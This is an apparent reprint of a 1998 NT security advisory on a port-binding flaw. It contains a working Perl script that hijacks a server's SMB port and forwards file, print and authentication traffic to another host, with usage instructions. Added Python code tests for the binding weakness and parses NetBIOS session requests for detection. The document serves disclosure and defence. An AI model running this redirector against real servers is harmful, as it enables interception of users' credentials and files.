SMB Redirect Program for NT

Reported February 10, 1998 by Weld Pond (weld@L0PHT.COM) on BugTraq

Systems Affected

Windows NT

Description:

This program uses the NT port binding vulnerability to redirect a machine's SMB services to another machine. It was posted by Andrew Tridgell (tridge@SAMBA.ANU.EDU.AU) on the Common Internet File System (CIFS@DISCUSS.MICROSOFT.COM) mailing list. The full message and the thread surrounding it are available via the web at:

This script demonstrates a major security problem with Windows NT4. It is based on an earlier script (paul.pl) that demonstrated a problem with a protocol change that Microsoft proposed. The change in this script takes advantage of a security hole pointed out by L0pht.

What this script does is allow any unprivileged user on an NT Server to redirect the local SMB services to any other SMB server for which they have an IP address. This allows the user to redirect file, printer and authentication services to another server. This has enormous consequences for security.

This script was written by Andrew Tridgell and is being sent to the CIFS discussion list so that CIFS developers become aware of this problem. It should be noted that the L0pht announcement (which predates this script) already provided an example command using netcat to achieve the same thing so this script does not actually offer malicious hackers anything more than what has already been widely distributed. I wrote this example so that the consequences would become clear to the people who are in a position to do something about fixing the problem.

Usage:

To use this script, install perl5, then run the command:
perl redirect.pl <localip> <remoteip>
for example:
perl redirect.pl 192.168.2.13 192.168.2.10
This would redirect any SMB connections made to the local server (whose IP address is 192.168.2.13) to the remote server 192.168.2.10. Any browsing, file access, authentication requests or printing done to the local server by SMB clients will be redirected to the remote server.

Workaround:

There is no immediate fix to this security problem yet available. A workaround is to disable local login access to non-trusted users. This can be achieved using the User Manager For Domains. At many sites this will be an acceptable solution because NT servers are often used only for remote file and printer services and do not really need to offer users the ability to run arbitrary programs.


Fix:

A proper fix will require a patch from Microsoft. Hopefully they will either implement privileged ports or they will get the socket options correct on all their servers so such bind() tricks are not possible.
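As an added audit check (not part of the advisory or Tridgell's script): the bind() trick the fix refers to only works if the OS lets a second socket bind to an address that already has a TCP listener. The Python function below reproduces that condition on a loopback listener it creates itself, and also shows the hardened listener using SO_EXCLUSIVEADDRUSE where the platform offers it; the function names are mine, the socket options are real.

```python
# Added audit check, not code from the advisory: does this host let a second
# socket (with SO_REUSEADDR, like the script's Reuse=>1) bind on top of an
# existing TCP listener?  Uses only a loopback listener it creates itself.
import socket

def second_bind_allowed(host: str = "127.0.0.1", exclusive: bool = False) -> bool:
    """Return True if a second bind on the service's address:port succeeds.

    exclusive=True sets SO_EXCLUSIVEADDRUSE on the service socket (a Windows
    option intended to block exactly this kind of takeover).  On platforms
    without it the flag is ignored and the result reflects the kernel's
    default SO_REUSEADDR rules (Linux and BSD refuse the second bind)."""
    service = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        if exclusive and hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
            service.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
        service.bind((host, 0))           # port 0: let the OS pick a free port
        service.listen(5)
        port = service.getsockname()[1]

        second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            second.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            second.bind((host, port))     # EADDRINUSE here means the takeover is blocked
            return True
        except OSError:
            return False
        finally:
            second.close()
    finally:
        service.close()

def audit() -> dict:
    """Both listener configurations side by side, as a defender would record them."""
    return {"default_listener": second_bind_allowed(),
            "exclusive_listener": second_bind_allowed(exclusive=True)}

if __name__ == "__main__":
    for name, hijackable in audit().items():
        print(f"{name}: {'second bind ALLOWED' if hijackable else 'second bind refused'}")
```

A result of True for the default listener is the precondition the script relies on; the check never touches port 139 itself, so it needs no privileges.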

```perl
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
use IO::Select;

if ($#ARGV != 1) {
    print "Usage: redirect.pl <localip> <remoteip>\n";
    exit 0;
}

my $local  = $ARGV[0];
my $target = $ARGV[1];

my $smbport = 139;
my $Msg;

# this is a *SMBSERVER netbios name (first-level encoded, 32 characters)
my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA";

print "setting up redirection from $local to $target ...\n";

# Create a local socket; Reuse=>1 sets SO_REUSEADDR, which is what lets an
# unprivileged process take over the SMB port on an unpatched NT server
my $sock1 = IO::Socket::INET->new(LocalAddr => $local, LocalPort => $smbport,
                                  Proto => "tcp", Listen => 5, Reuse => 1)
    || die "cannot bind $local:$smbport: $!";

while (1) {

    print "listening on $local\n";

    # Accept a connection
    my $IS = $sock1->accept() || die "accept failed: $!";

    # Open a socket to the remote host
    my $OS = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $smbport,
                                   Proto => "tcp")
        || die "cannot connect to $target:$smbport: $!";

    print "connected to $target\n";

    # Create a read set for select()
    my $rs = IO::Select->new();
    $rs->add($IS, $OS);

    my $first    = 1;
    my $finished = 0;

    while (! $finished) {
        my ($r_ready) = IO::Select->select($rs, undef, undef, undef);

        foreach my $i (@$r_ready) {
            # whatever arrives on one side is forwarded to the other
            my $o;
            $o = $OS if $i == $IS;
            $o = $IS if $i == $OS;

            recv($i, $Msg, 8192, 0);
            if (! length $Msg) {
                $finished = 1;
                last;    # was 'break', which is not Perl
            }

            # the client's first packet is the NetBIOS session request (type
            # 0x81); its called name (bytes 5..36) is swapped for *SMBSERVER
            # so the remote server accepts the session as its own
            if ($first && substr($Msg, 0, 1) eq "\x81") {
                print "replacing called name\n";
                my $msg2 = join("", substr($Msg, 0, 5), $netbname,
                                substr($Msg, 37, length($Msg) - 37));
                send($o, $msg2, 0);
                $first = 0;
            } else {
                if ($i == $OS) { $Msg =~ s/Paul/Oops/mg; }
                send($o, $Msg, 0);
            }
        }
    }

    # tear down both sides, then loop back to the top again
    close($IS);
    close($OS);
}
```
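As an added example (mine, not from the script or the advisory), here is the NetBIOS session-request layout that the script's substr() offsets depend on, in Python: the first-level name encoding that produces the $netbname constant, a parser that checks the fixed layout (type 0x81 at byte 0, length byte 0x20 at byte 4, 32-character called name at bytes 5..36, NUL at byte 37), and the same byte substitution the script performs. The names FILESRV and WORKSTATION1 are constructed sample values.

```python
# Added example, not part of the advisory: the NetBIOS session request the
# redirector rewrites, per RFC 1001/1002, with the page's $netbname constant.
import struct

PAGE_NETBNAME = "CKFDENECFDEFFCFGEFFCCACACACACACA"   # $netbname from the script

def nb_encode(name: str) -> str:
    """First-level encoding: pad to 16 bytes with spaces (the 16th byte is the
    name suffix, 0x20 for a file server), then write each nibble as 'A'..'P'."""
    if len(name) > 16:
        raise ValueError("NetBIOS names are at most 16 bytes")
    raw = name.encode("ascii").ljust(16, b" ")
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)

def nb_decode(encoded: str) -> str:
    """Inverse of nb_encode; trailing space padding is stripped."""
    if len(encoded) != 32 or any(c not in "ABCDEFGHIJKLMNOP" for c in encoded):
        raise ValueError("not a 32-character first-level encoded name")
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    return raw.rstrip(b" ").decode("ascii")

def build_session_request(called: str, calling: str) -> bytes:
    """Constructed sample packet: type 0x81, flags, 16-bit length, then the
    called and calling names, each as 0x20 + 32 encoded chars + 0x00."""
    body = b"".join(b"\x20" + nb_encode(n).encode("ascii") + b"\x00"
                    for n in (called, calling))
    return b"\x81\x00" + struct.pack("!H", len(body)) + body

def parse_session_request(pkt: bytes) -> dict:
    """Split a session request into its two names, refusing anything that does
    not have the fixed layout the script's offsets 0, 5 and 37 assume."""
    if len(pkt) != 72 or pkt[0] != 0x81:
        raise ValueError("not a NetBIOS session request")
    length = ((pkt[1] & 0x01) << 16) | struct.unpack("!H", pkt[2:4])[0]
    if length != 68 or pkt[4] != 0x20 or pkt[37] != 0 or pkt[38] != 0x20 or pkt[71] != 0:
        raise ValueError("malformed name fields")
    return {"called": nb_decode(pkt[5:37].decode("ascii")),
            "calling": nb_decode(pkt[39:71].decode("ascii"))}

def rewrite_called_name(pkt: bytes, new_name: str) -> bytes:
    """The byte surgery the script does with substr/join: keep bytes 0..4,
    swap in the 32-char encoded name, keep everything from byte 37 on."""
    parse_session_request(pkt)   # only operate on a well-formed request
    return pkt[:5] + nb_encode(new_name).encode("ascii") + pkt[37:]

if __name__ == "__main__":
    req = build_session_request("FILESRV", "WORKSTATION1")
    print(parse_session_request(req))
    print(parse_session_request(rewrite_called_name(req, "*SMBSERVER")))
```

On the receiving server, a session request whose called name is the generic *SMBSERVER while the calling name and TCP source do not belong together is the trace this redirection leaves.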

Comments:

According to David LeBlanc (dleblanc@MINDSPRING.COM), as posted to BugTraq on February 10, 1998:

One correction needs to be made here. There is no such thing as an unprivileged user on a default NT server. The only accounts which are allowed to log on locally by default are high level accounts, such as admins and server ops.

To learn more about new NT security concerns, subscribe to NTSD.

Credit:
Reported by: Weld Pond (weld@L0PHT.COM)
Posted here at NTSecurity.Net